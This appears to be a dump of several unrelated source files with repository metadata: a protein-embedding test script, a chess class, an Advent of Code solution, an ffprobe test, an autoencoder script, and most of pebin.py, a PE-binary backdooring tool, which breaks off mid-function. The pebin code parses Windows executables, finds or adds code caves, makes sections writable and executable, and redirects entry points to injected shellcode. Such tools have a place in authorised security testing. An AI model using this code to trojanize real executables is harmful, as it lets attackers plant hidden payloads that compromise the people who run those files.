save_object(data2, "Data/dingo_%s_ks_norm_neg_data" % asp)
return ks_2samp(data1, data2)
if __name__ == "__main__":
cleanup()
from pymongo import MongoClient
client = MongoClient('mongodb://localhost:27017/')
db = client['prot2vec']
asp = 'F' # molecular function
onto = get_ontology(asp)
t0 = datetime.datetime(2014, 1, 1, 0, 0)
t1 = datetime.datetime(2014, 9, 1, 0, 0)
# t0 = datetime.datetime(2017, 1, 1, 0, 0)
# t1 = datetime.datetime.utcnow()
print("Indexing Data...")
trn_stream, tst_stream = get_training_and_validation_streams(db, t0, t1, asp)
print("Loading Training Data...")
uid2seq_trn, _, go2ids_trn = trn_stream.to_dictionaries(propagate=True)
print("Loading Validation Data...")
uid2seq_tst, _, go2ids_tst = tst_stream.to_dictionaries(propagate=True)
print("Building Graph...")
graph = Graph(onto, uid2seq_trn, go2ids_trn)
print("Graph contains %d nodes" % len(graph))
print("Load DigoNet")
go_embedding_weights = np.asarray([onto.todense(go) for go in onto.classes])
net = AttnDecoder(ATTN, 100, 10, go_embedding_weights)
net = net.cuda()
# ckpth = "/tmp/digo_0.01438.tar"
ckpth = "/tmp/digo_0.15157.tar"
print("=> loading checkpoint '%s'" % ckpth)
checkpoint = torch.load(ckpth, map_location=lambda storage, loc: storage)
net.load_state_dict(checkpoint['net'])
print("Running K-S tests...")
pos, neg = sample_pos_neg(graph)
data_pos, data_neg = [], []
for (p_s1, p_s2, p_n), (n_s1, n_s2, n_n) in zip(pos, neg):
data_pos.append((p_s1, p_n))
data_pos.append((p_s2, p_n))
data_neg.append((n_s1, n_n))
data_neg.append((n_s2, n_n))
compute_vectors(data_pos, net, onto)
compute_vectors(data_neg, net, onto)
res = kolmogorov_smirnov_norm(data_pos, data_neg, l2_norm)
print("K-S l2_norm: %s, %s" % res)
res = kolmogorov_smirnov_cosine(pos, neg, cosine_similarity)
print("K-S cosine: %s, %s" % res)
| mit | -2,146,032,486,321,290,800 | 30.200326 | 99 | 0.577909 | false | 3.347955 | false | false | false |
erget/KingSnake | king_snake/player.py | 1 | 3615 | """A chess player."""
from king_snake.errors import (FieldMustBeCastledError,
FieldOccupiedError,
IllegalMoveError,
PawnMustCaptureError,
TurnError)
from king_snake.figures import Pawn, Rook, Knight, Bishop, Queen, King
class Player(object):
"""A chess player."""
def __repr__(self):
return "Player()"
def __str__(self):
if self.chessboard:
return_string = ("{color} Player on "
"{chessboard}\n"
"Figures: "
"{figures}".format(color=self.color,
chessboard=self.chessboard,
figures=self.figures))
else:
return_string = self.__repr__()
return return_string
def __init__(self):
self.chessboard = None
self.figures = None
self.king = None
self.color = None
@property
def opponent(self):
"""Return other player in chess game"""
if self.color == "white":
return self.chessboard.players["black"]
else:
return self.chessboard.players["white"]
def set_up_board(self, chessboard):
"""Set up pieces on given chessboard and find other player."""
self.chessboard = chessboard
if self == self.chessboard.players["white"]:
self.color = "white"
else:
self.color = "black"
self.figures = list(Pawn(self) for pawns in range(8))
for doubled_piece in (Rook, Knight, Bishop) * 2:
self.figures.append(doubled_piece(self))
self.figures.append(Queen(self))
self.king = King(self)
self.figures.append(self.king)
def move(self, start, goal):
"""
Move a piece to a new field.
First verify if self is the chessboard's current player. Then check if
a moveable figure is located at the start field. If the piece can be
moved, move to the goal field, capturing a figure at the goal field if
necessary. Finally, check if the move would put the own king in check.
If yes, roll back the move. Otherwise, record the current turn on all
moved pieces and end the turn.
        @param start - String used to look up the start field object (e.g. "E2")
        @param goal - Like start
"""
if self != self.chessboard.current_player:
raise TurnError("Move attempted out of turn.")
start_field = self.chessboard.fields[start]
goal_field = self.chessboard.fields[goal]
figure = start_field.figure
        if figure not in self.figures:
raise IllegalMoveError("Player does not own a piece at given "
"position.")
try:
figure.move(goal_field)
captured_piece = None
except (FieldOccupiedError, PawnMustCaptureError):
captured_piece = figure.capture(goal_field)
except FieldMustBeCastledError:
captured_piece = figure.castle(goal_field)
if self.king.in_check:
self.chessboard.rollback()
raise IllegalMoveError("Move would put player's king in check.")
figure.already_moved = True
figure.last_moved = self.chessboard.current_move
if captured_piece:
captured_piece.last_moved = self.chessboard.current_move
self.chessboard.end_turn(start, goal)
| gpl-3.0 | -8,314,341,011,309,242,000 | 35.515152 | 78 | 0.561549 | false | 4.164747 | false | false | false |
madfist/aoc2016 | aoc2016/day20/main.py | 1 | 1033 | import sys
import re
def prepare(data):
ranges = []
for d in data.split('\n'):
m = re.match(r'(\d+)-(\d+)', d)
ranges.append([int(m.group(1)), int(m.group(2))])
return sorted(ranges, key=lambda r:r[0])
def get_lowest(data):
sr = prepare(data)
high = sr[0][1]
for i in range(1,len(sr)):
if sr[i][0] > high+1:
return high+1
high = max(high, sr[i][1])
def count_all(data):
sr = prepare(data)
high = sr[0][1]
count = 0
for i in range(1,len(sr)):
if high+1 < sr[i][0]:
count += sr[i][0] - high - 1
high = max(sr[i][1], high)
if high < 4294967295:
count += 4294967295 - high
return count
def main():
if (len(sys.argv) < 2):
print("Usage: python3", sys.argv[0], "<data>")
exit(1)
with open(sys.argv[1], 'r') as input:
data = input.read()
print("Lowest available:", get_lowest(data))
print("Available addresses:", count_all(data))
if __name__ == '__main__':
main() | mit | 201,707,456,742,472,450 | 24.219512 | 57 | 0.518877 | false | 2.994203 | false | false | false |
melon-boy/odroid-webserver | pkg/ffmpeg_pywrapper/ffmpeg_pywrapper/tests/test.py | 1 | 2414 | #!/usr/bin/python
from unittest import TestCase, main
from ffmpeg_pywrapper.ffprobe import FFProbe
import pkg_resources
class TestFFProbe(TestCase):
'''
Unit test for FFProbe output
'''
VIDEO_FILE = pkg_resources.resource_filename('ffmpeg_pywrapper', 'res/test.mp4')
def test_print_formats(self):
ff = FFProbe(self.VIDEO_FILE)
filename = str(ff.get_format_filename())
self.assertTrue(filename)
duration = str(ff.get_format_duration())
self.assertTrue(duration)
format_name = str(ff.get_format_format_name())
self.assertTrue(format_name)
start_time = str(ff.get_format_start_time())
self.assertTrue(start_time)
size = str(ff.get_format_size())
self.assertTrue(size)
bit_rate = str(ff.get_format_bit_rate())
self.assertTrue(bit_rate)
print('-------------------------------------------------')
print('- Test 1: video file formats -')
print('-------------------------------------------------')
print('File name: ' + str(filename))
print('Duration (seconds): ' + str(duration))
print('Format: ' + str(format_name))
print('Start time (seconds): ' + str(start_time))
print('File Size (Kb): ' + str(size))
print('Bit rate (Kb/s): ' + str(bit_rate))
print('-------------------------------------------------')
print('- End of Test 1. -')
print('-------------------------------------------------')
    def test_command_line_execution(self):
        print('-------------------------------------------------')
        print('- Test 2: ffprobe command line execution        -')
        print('-------------------------------------------------')
        ff = FFProbe(self.VIDEO_FILE)
options = '-v error -show_entries format'
print('Arguments : ' + str(options))
res = ff.command_line_execution(options)
print('Output: ' + str(res))
print('-------------------------------------------------')
print('- End of Test 2. -')
print('-------------------------------------------------')
if __name__ == '__main__':
main()
| mit | -4,393,099,233,897,129,500 | 32.527778 | 84 | 0.423364 | false | 4.770751 | true | false | false |
lmjohns3/cube-experiment | analysis/11-compress-jacobians.py | 1 | 2143 | import climate
import glob
import gzip
import io
import lmj.cubes
import logging
import numpy as np
import os
import pandas as pd
import pickle
import theanets
def compress(source, k, activation, **kwargs):
fns = sorted(glob.glob(os.path.join(source, '*', '*_jac.csv.gz')))
logging.info('%s: found %d jacobians', source, len(fns))
# the clipping operation affects about 2% of jacobian values.
dfs = [np.clip(pd.read_csv(fn, index_col='time').dropna(), -10, 10)
for fn in fns]
B, N = 128, dfs[0].shape[1]
logging.info('loaded %s rows of %d-D data from %d files',
sum(len(df) for df in dfs), N, len(dfs))
def batch():
batch = np.zeros((B, N), 'f')
for b in range(B):
a = np.random.randint(len(dfs))
batch[b] = dfs[a].iloc[np.random.randint(len(dfs[a])), :]
return [batch]
pca = theanets.Autoencoder([N, (k, activation), (N, 'tied')])
pca.train(batch, **kwargs)
key = '{}_k{}'.format(activation, k)
if 'hidden_l1' in kwargs:
key += '_s{hidden_l1:.4f}'.format(**kwargs)
for df, fn in zip(dfs, fns):
df = pd.DataFrame(pca.encode(df.values.astype('f')), index=df.index)
s = io.StringIO()
df.to_csv(s, index_label='time')
out = fn.replace('_jac', '_jac_' + key)
with gzip.open(out, 'wb') as handle:
handle.write(s.getvalue().encode('utf-8'))
logging.info('%s: saved %s', out, df.shape)
out = os.path.join(source, 'pca_{}.pkl'.format(key))
pickle.dump(pca, open(out, 'wb'))
@climate.annotate(
root='load data files from subject directories in this path',
k=('compress to this many dimensions', 'option', None, int),
activation=('use this activation function', 'option'),
)
def main(root, k=1000, activation='relu'):
for subject in lmj.cubes.Experiment(root).subjects:
compress(subject.root, k, activation,
momentum=0.9,
hidden_l1=0.01,
weight_l1=0.01,
monitors={'hid1:out': (0.01, 0.1, 1, 10)})
if __name__ == '__main__':
climate.call(main)
| mit | 1,167,373,156,157,772,800 | 30.057971 | 76 | 0.580495 | false | 3.188988 | false | false | false |
codercold/Veil-Evasion | tools/backdoor/pebin.py | 1 | 54056 | '''
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
Copyright (C) 2013,2014, Joshua Pitts
License: GPLv3
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
See <http://www.gnu.org/licenses/> for a copy of the GNU General
Public License
Currently supports win32/64 PE and linux32/64 ELF only(intel architecture).
This program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.
'''
import sys
import os
import struct
import shutil
import platform
import stat
import time
import subprocess
import pefile
from random import choice
from intel.intelCore import intelCore
from intel.intelmodules import eat_code_caves
from intel.WinIntelPE32 import winI32_shellcode
from intel.WinIntelPE64 import winI64_shellcode
MachineTypes = {'0x0': 'AnyMachineType',
'0x1d3': 'Matsushita AM33',
'0x8664': 'x64',
'0x1c0': 'ARM LE',
'0x1c4': 'ARMv7',
'0xaa64': 'ARMv8 x64',
'0xebc': 'EFIByteCode',
'0x14c': 'Intel x86',
'0x200': 'Intel Itanium',
'0x9041': 'M32R',
'0x266': 'MIPS16',
'0x366': 'MIPS w/FPU',
'0x466': 'MIPS16 w/FPU',
'0x1f0': 'PowerPC LE',
'0x1f1': 'PowerPC w/FP',
'0x166': 'MIPS LE',
'0x1a2': 'Hitachi SH3',
'0x1a3': 'Hitachi SH3 DSP',
'0x1a6': 'Hitachi SH4',
'0x1a8': 'Hitachi SH5',
'0x1c2': 'ARM or Thumb -interworking',
'0x169': 'MIPS little-endian WCE v2'
}
#What is supported:
supported_types = ['Intel x86', 'x64']
class pebin():
"""
    This is the PE binary class. PE files are parsed, checked for support, and patched with the selected shellcode.
"""
def __init__(self, FILE, OUTPUT, SHELL, NSECTION='sdata', DISK_OFFSET=0, ADD_SECTION=False,
CAVE_JUMPING=False, PORT=8888, HOST="127.0.0.1", SUPPLIED_SHELLCODE=None,
INJECTOR=False, CHANGE_ACCESS=True, VERBOSE=False, SUPPORT_CHECK=False,
SHELL_LEN=300, FIND_CAVES=False, SUFFIX=".old", DELETE_ORIGINAL=False, CAVE_MINER=False,
IMAGE_TYPE="ALL", ZERO_CERT=True, CHECK_ADMIN=False, PATCH_DLL=True):
self.FILE = FILE
self.OUTPUT = OUTPUT
self.SHELL = SHELL
self.NSECTION = NSECTION
self.DISK_OFFSET = DISK_OFFSET
self.ADD_SECTION = ADD_SECTION
self.CAVE_JUMPING = CAVE_JUMPING
self.PORT = PORT
self.HOST = HOST
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.INJECTOR = INJECTOR
self.CHANGE_ACCESS = CHANGE_ACCESS
self.VERBOSE = VERBOSE
self.SUPPORT_CHECK = SUPPORT_CHECK
self.SHELL_LEN = SHELL_LEN
self.FIND_CAVES = FIND_CAVES
self.SUFFIX = SUFFIX
self.DELETE_ORIGINAL = DELETE_ORIGINAL
self.CAVE_MINER = CAVE_MINER
self.IMAGE_TYPE = IMAGE_TYPE
self.ZERO_CERT = ZERO_CERT
self.CHECK_ADMIN = CHECK_ADMIN
self.PATCH_DLL = PATCH_DLL
self.flItms = {}
def run_this(self):
if self.INJECTOR is True:
self.injector()
sys.exit()
if self.FIND_CAVES is True:
issupported = self.support_check()
if issupported is False:
print self.FILE, "is not supported."
return False
print ("Looking for caves with a size of %s bytes (measured as an integer" % self.SHELL_LEN)
self.find_all_caves()
return True
if self.SUPPORT_CHECK is True:
if not self.FILE:
print "You must provide a file to see if it is supported (-f)"
return False
try:
is_supported = self.support_check()
except Exception, e:
is_supported = False
print 'Exception:', str(e), '%s' % self.FILE
if is_supported is False:
print "%s is not supported." % self.FILE
return False
else:
print "%s is supported." % self.FILE
return True
self.output_options()
return self.patch_pe()
def gather_file_info_win(self):
"""
Gathers necessary PE header information to backdoor
        a file and stores it in the file-information dict self.flItms
"""
#To do:
# verify signed vs unsigned
# map all headers
# map offset once the magic field is determined of 32+/32
self.binary.seek(int('3C', 16))
print "[*] Gathering file info"
self.flItms['filename'] = self.FILE
self.flItms['buffer'] = 0
self.flItms['JMPtoCodeAddress'] = 0
self.flItms['LocOfEntryinCode_Offset'] = self.DISK_OFFSET
#---!!!! This will need to change for x64 !!!!
#not so sure now..
self.flItms['dis_frm_pehdrs_sectble'] = 248
self.flItms['pe_header_location'] = struct.unpack('<i', self.binary.read(4))[0]
# Start of COFF
self.flItms['COFF_Start'] = self.flItms['pe_header_location'] + 4
self.binary.seek(self.flItms['COFF_Start'])
self.flItms['MachineType'] = struct.unpack('<H', self.binary.read(2))[0]
if self.VERBOSE is True:
for mactype, name in MachineTypes.iteritems():
if int(mactype, 16) == self.flItms['MachineType']:
print 'MachineType is:', name
#self.binary.seek(self.flItms['BoundImportLocation'])
#self.flItms['BoundImportLOCinCode'] = struct.unpack('<I', self.binary.read(4))[0]
self.binary.seek(self.flItms['COFF_Start'] + 2, 0)
self.flItms['NumberOfSections'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['TimeDateStamp'] = struct.unpack('<I', self.binary.read(4))[0]
self.binary.seek(self.flItms['COFF_Start'] + 16, 0)
self.flItms['SizeOfOptionalHeader'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['Characteristics'] = struct.unpack('<H', self.binary.read(2))[0]
#End of COFF
self.flItms['OptionalHeader_start'] = self.flItms['COFF_Start'] + 20
#if self.flItms['SizeOfOptionalHeader']:
#Begin Standard Fields section of Optional Header
self.binary.seek(self.flItms['OptionalHeader_start'])
self.flItms['Magic'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['MajorLinkerVersion'] = struct.unpack("!B", self.binary.read(1))[0]
self.flItms['MinorLinkerVersion'] = struct.unpack("!B", self.binary.read(1))[0]
self.flItms['SizeOfCode'] = struct.unpack("<I", self.binary.read(4))[0]
self.flItms['SizeOfInitializedData'] = struct.unpack("<I", self.binary.read(4))[0]
self.flItms['SizeOfUninitializedData'] = struct.unpack("<I",
self.binary.read(4))[0]
self.flItms['AddressOfEntryPoint'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['BaseOfCode'] = struct.unpack('<I', self.binary.read(4))[0]
#print 'Magic', self.flItms['Magic']
if self.flItms['Magic'] != int('20B', 16):
#print 'Not 0x20B!'
self.flItms['BaseOfData'] = struct.unpack('<I', self.binary.read(4))[0]
# End Standard Fields section of Optional Header
# Begin Windows-Specific Fields of Optional Header
if self.flItms['Magic'] == int('20B', 16):
#print 'x64!'
self.flItms['ImageBase'] = struct.unpack('<Q', self.binary.read(8))[0]
else:
self.flItms['ImageBase'] = struct.unpack('<I', self.binary.read(4))[0]
#print 'self.flItms[ImageBase]', hex(self.flItms['ImageBase'])
self.flItms['SectionAlignment'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['FileAlignment'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
self.binary.read(2))[0]
self.flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
self.binary.read(2))[0]
self.flItms['MajorImageVersion'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['MinorImageVersion'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['MajorSubsystemVersion'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['MinorSubsystemVersion'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['Win32VersionValue'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfImageLoc'] = self.binary.tell()
self.flItms['SizeOfImage'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfHeaders'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['CheckSum'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['Subsystem'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['DllCharacteristics'] = struct.unpack('<H', self.binary.read(2))[0]
if self.flItms['Magic'] == int('20B', 16):
self.flItms['SizeOfStackReserve'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['SizeOfStackCommit'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['SizeOfHeapReserve'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['SizeOfHeapCommit'] = struct.unpack('<Q', self.binary.read(8))[0]
else:
self.flItms['SizeOfStackReserve'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfStackCommit'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfHeapReserve'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfHeapCommit'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['LoaderFlags'] = struct.unpack('<I', self.binary.read(4))[0] # zero
self.flItms['NumberofRvaAndSizes'] = struct.unpack('<I', self.binary.read(4))[0]
# End Windows-Specific Fields of Optional Header
# Begin Data Directories of Optional Header
self.flItms['ExportTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['ImportTableLOCInPEOptHdrs'] = self.binary.tell()
self.flItms['ImportTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['ResourceTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['ExceptionTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['CertTableLOC'] = self.binary.tell()
self.flItms['CertificateTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['BaseReLocationTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['Debug'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['Architecutre'] = struct.unpack('<Q', self.binary.read(8))[0] # zero
self.flItms['GlobalPrt'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['TLS Table'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['LoadConfigTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['BoundImportLocation'] = self.binary.tell()
#print 'BoundImportLocation', hex(self.flItms['BoundImportLocation'])
self.flItms['BoundImport'] = struct.unpack('<Q', self.binary.read(8))[0]
self.binary.seek(self.flItms['BoundImportLocation'])
self.flItms['BoundImportLOCinCode'] = struct.unpack('<I', self.binary.read(4))[0]
#print 'first IATLOCIN CODE', hex(self.flItms['BoundImportLOCinCode'])
self.flItms['BoundImportSize'] = struct.unpack('<I', self.binary.read(4))[0]
#print 'BoundImportSize', hex(self.flItms['BoundImportSize'])
self.flItms['IAT'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['DelayImportDesc'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['CLRRuntimeHeader'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['Reserved'] = struct.unpack('<Q', self.binary.read(8))[0] # zero
self.flItms['BeginSections'] = self.binary.tell()
        if self.flItms['NumberOfSections'] != 0:
self.flItms['Sections'] = []
for section in range(self.flItms['NumberOfSections']):
sectionValues = []
sectionValues.append(self.binary.read(8))
# VirtualSize
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# VirtualAddress
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# SizeOfRawData
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# PointerToRawData
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# PointerToRelocations
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# PointerToLinenumbers
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# NumberOfRelocations
sectionValues.append(struct.unpack('<H', self.binary.read(2))[0])
# NumberOfLinenumbers
sectionValues.append(struct.unpack('<H', self.binary.read(2))[0])
# SectionFlags
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
self.flItms['Sections'].append(sectionValues)
if 'UPX'.lower() in sectionValues[0].lower():
print "UPX files not supported."
return False
if ('.text\x00\x00\x00' == sectionValues[0] or
'AUTO\x00\x00\x00\x00' == sectionValues[0] or
'CODE\x00\x00\x00\x00' == sectionValues[0]):
self.flItms['textSectionName'] = sectionValues[0]
self.flItms['textVirtualAddress'] = sectionValues[2]
self.flItms['textPointerToRawData'] = sectionValues[4]
elif '.rsrc\x00\x00\x00' == sectionValues[0]:
self.flItms['rsrcSectionName'] = sectionValues[0]
self.flItms['rsrcVirtualAddress'] = sectionValues[2]
self.flItms['rsrcSizeRawData'] = sectionValues[3]
self.flItms['rsrcPointerToRawData'] = sectionValues[4]
self.flItms['VirtualAddress'] = self.flItms['SizeOfImage']
self.flItms['LocOfEntryinCode'] = (self.flItms['AddressOfEntryPoint'] -
self.flItms['textVirtualAddress'] +
self.flItms['textPointerToRawData'] +
self.flItms['LocOfEntryinCode_Offset'])
else:
self.flItms['LocOfEntryinCode'] = (self.flItms['AddressOfEntryPoint'] -
self.flItms['LocOfEntryinCode_Offset'])
self.flItms['VrtStrtngPnt'] = (self.flItms['AddressOfEntryPoint'] +
self.flItms['ImageBase'])
self.binary.seek(self.flItms['BoundImportLOCinCode'])
self.flItms['ImportTableALL'] = self.binary.read(self.flItms['BoundImportSize'])
self.flItms['NewIATLoc'] = self.flItms['BoundImportLOCinCode'] + 40
####################################
#### Parse imports via pefile ######
self.binary.seek(0)
#make this option only if a IAT based shellcode is selected
if 'iat' in self.SHELL:
print "[*] Loading PE in pefile"
pe = pefile.PE(self.FILE, fast_load=True)
#pe = pefile.PE(data=self.binary)
print "[*] Parsing data directories"
pe.parse_data_directories()
try:
for entry in pe.DIRECTORY_ENTRY_IMPORT:
#print entry.dll
for imp in entry.imports:
#print imp.name
#print "\t", imp.name
if imp.name is None:
continue
if imp.name.lower() == 'loadlibrarya':
self.flItms['LoadLibraryAOffset'] = imp.address - pe.OPTIONAL_HEADER.ImageBase
self.flItms['LoadLibraryA'] = imp.address
if imp.name.lower() == 'getprocaddress':
self.flItms['GetProcAddressOffset'] = imp.address - pe.OPTIONAL_HEADER.ImageBase
self.flItms['GetProcAddress'] = imp.address
''' #save for later use
if imp.name.lower() == 'createprocessa':
print imp.name, hex(imp.address)
if imp.name.lower() == 'waitforsingleobject':
print imp.name, hex(imp.address)
if imp.name.lower() == 'virtualalloc':
print imp.name, hex(imp.address)
if imp.name.lower() == 'connect':
print imp.name, hex(imp.address)
if imp.name.lower() == 'createthread':
print imp.name, hex(imp.address)
'''
except Exception as e:
print "Exception:", str(e)
#####################################
def print_flItms(self, flItms):
keys = self.flItms.keys()
keys.sort()
for item in keys:
if type(self.flItms[item]) == int:
print item + ':', hex(self.flItms[item])
elif item == 'Sections':
print "-" * 50
for section in self.flItms['Sections']:
print "Section Name", section[0]
print "Virutal Size", hex(section[1])
print "Virtual Address", hex(section[2])
print "SizeOfRawData", hex(section[3])
print "PointerToRawData", hex(section[4])
print "PointerToRelocations", hex(section[5])
print "PointerToLinenumbers", hex(section[6])
print "NumberOfRelocations", hex(section[7])
print "NumberOfLinenumbers", hex(section[8])
print "SectionFlags", hex(section[9])
print "-" * 50
else:
print item + ':', self.flItms[item]
print "*" * 50, "END flItms"
def change_section_flags(self, section):
"""
Changes the user selected section to RWE for successful execution
"""
print "[*] Changing Section Flags"
self.flItms['newSectionFlags'] = int('e00000e0', 16)
self.binary.seek(self.flItms['BeginSections'], 0)
for _ in range(self.flItms['NumberOfSections']):
sec_name = self.binary.read(8)
if section in sec_name:
self.binary.seek(28, 1)
self.binary.write(struct.pack('<I', self.flItms['newSectionFlags']))
return
else:
self.binary.seek(32, 1)
def create_code_cave(self):
"""
        This function creates a code cave for shellcode to hide in.
        It uses the header info gathered by gather_file_info_win, appends
        a new section to the file and updates self.flItms accordingly.
"""
print "[*] Creating Code Cave"
self.flItms['NewSectionSize'] = len(self.flItms['shellcode']) + 250 # bytes
self.flItms['SectionName'] = self.NSECTION # less than 7 chars
self.flItms['filesize'] = os.stat(self.flItms['filename']).st_size
self.flItms['newSectionPointerToRawData'] = self.flItms['filesize']
self.flItms['VirtualSize'] = int(str(self.flItms['NewSectionSize']), 16)
self.flItms['SizeOfRawData'] = self.flItms['VirtualSize']
self.flItms['NewSectionName'] = "." + self.flItms['SectionName']
self.flItms['newSectionFlags'] = int('e00000e0', 16)
self.binary.seek(self.flItms['pe_header_location'] + 6, 0)
self.binary.write(struct.pack('<h', self.flItms['NumberOfSections'] + 1))
self.binary.seek(self.flItms['SizeOfImageLoc'], 0)
self.flItms['NewSizeOfImage'] = (self.flItms['VirtualSize'] +
self.flItms['SizeOfImage'])
self.binary.write(struct.pack('<I', self.flItms['NewSizeOfImage']))
self.binary.seek(self.flItms['BoundImportLocation'])
if self.flItms['BoundImportLOCinCode'] != 0:
self.binary.write(struct.pack('=i', self.flItms['BoundImportLOCinCode'] + 40))
self.binary.seek(self.flItms['BeginSections'] +
40 * self.flItms['NumberOfSections'], 0)
self.binary.write(self.flItms['NewSectionName'] +
"\x00" * (8 - len(self.flItms['NewSectionName'])))
self.binary.write(struct.pack('<I', self.flItms['VirtualSize']))
self.binary.write(struct.pack('<I', self.flItms['SizeOfImage']))
self.binary.write(struct.pack('<I', self.flItms['SizeOfRawData']))
self.binary.write(struct.pack('<I', self.flItms['newSectionPointerToRawData']))
if self.VERBOSE is True:
print 'New Section PointerToRawData'
print self.flItms['newSectionPointerToRawData']
self.binary.write(struct.pack('<I', 0))
self.binary.write(struct.pack('<I', 0))
self.binary.write(struct.pack('<I', 0))
self.binary.write(struct.pack('<I', self.flItms['newSectionFlags']))
self.binary.write(self.flItms['ImportTableALL'])
self.binary.seek(self.flItms['filesize'] + 1, 0) # moving to end of file
nop = choice(intelCore.nops)
if nop > 144:
self.binary.write(struct.pack('!H', nop) * (self.flItms['VirtualSize'] / 2))
else:
self.binary.write(struct.pack('!B', nop) * (self.flItms['VirtualSize']))
self.flItms['CodeCaveVirtualAddress'] = (self.flItms['SizeOfImage'] +
self.flItms['ImageBase'])
self.flItms['buffer'] = int('200', 16) # bytes
self.flItms['JMPtoCodeAddress'] = (self.flItms['CodeCaveVirtualAddress'] -
self.flItms['AddressOfEntryPoint'] -
self.flItms['ImageBase'] - 5 +
self.flItms['buffer'])
def find_all_caves(self):
"""
        This function finds all the code caves in the given file.
        Prints the results to the screen.
"""
print "[*] Looking for caves"
SIZE_CAVE_TO_FIND = self.SHELL_LEN
BeginCave = 0
Tracking = 0
count = 1
caveTracker = []
caveSpecs = []
self.binary = open(self.FILE, 'r+b')
self.binary.seek(0)
while True:
try:
s = struct.unpack("<b", self.binary.read(1))[0]
except Exception as e:
#print str(e)
break
if s == 0:
if count == 1:
BeginCave = Tracking
count += 1
else:
if count >= SIZE_CAVE_TO_FIND:
caveSpecs.append(BeginCave)
caveSpecs.append(Tracking)
caveTracker.append(caveSpecs)
count = 1
caveSpecs = []
Tracking += 1
for caves in caveTracker:
for section in self.flItms['Sections']:
sectionFound = False
if caves[0] >= section[4] and caves[1] <= (section[3] + section[4]) and \
caves[1] - caves[0] >= SIZE_CAVE_TO_FIND:
print "We have a winner:", section[0]
print '->Begin Cave', hex(caves[0])
print '->End of Cave', hex(caves[1])
print 'Size of Cave (int)', caves[1] - caves[0]
print 'SizeOfRawData', hex(section[3])
print 'PointerToRawData', hex(section[4])
print 'End of Raw Data:', hex(section[3] + section[4])
print '*' * 50
sectionFound = True
break
if sectionFound is False:
try:
print "No section"
print '->Begin Cave', hex(caves[0])
print '->End of Cave', hex(caves[1])
print 'Size of Cave (int)', caves[1] - caves[0]
print '*' * 50
except Exception as e:
print str(e)
print "[*] Total of %s caves found" % len(caveTracker)
self.binary.close()
def find_cave(self):
"""This function finds all code caves, allowing the user
to pick the cave for injecting shellcode."""
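        # The interactive prompt also accepts commands handled by the caller (patch_pe):
        #   append/a - give up on caves and append a new section instead,
        #   jump/j   - split the shellcode across several caves,
        #   single/s - keep the shellcode in a single cave,
        #   ignore/i - skip patching this binary.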
len_allshells = ()
if self.flItms['cave_jumping'] is True:
for item in self.flItms['allshells']:
len_allshells += (len(item), )
len_allshells += (len(self.flItms['resumeExe']), )
SIZE_CAVE_TO_FIND = sorted(len_allshells)[0]
else:
SIZE_CAVE_TO_FIND = self.flItms['shellcode_length']
len_allshells = (self.flItms['shellcode_length'], )
print "[*] Looking for caves that will fit the minimum "\
"shellcode length of %s" % SIZE_CAVE_TO_FIND
print "[*] All caves lengths: ", len_allshells
Tracking = 0
count = 1
#BeginCave=0
caveTracker = []
caveSpecs = []
self.binary.seek(0)
while True:
try:
s = struct.unpack("<b", self.binary.read(1))[0]
except: # Exception as e:
#print "CODE CAVE", str(e)
break
if s == 0:
if count == 1:
BeginCave = Tracking
count += 1
else:
if count >= SIZE_CAVE_TO_FIND:
caveSpecs.append(BeginCave)
caveSpecs.append(Tracking)
caveTracker.append(caveSpecs)
count = 1
caveSpecs = []
Tracking += 1
pickACave = {}
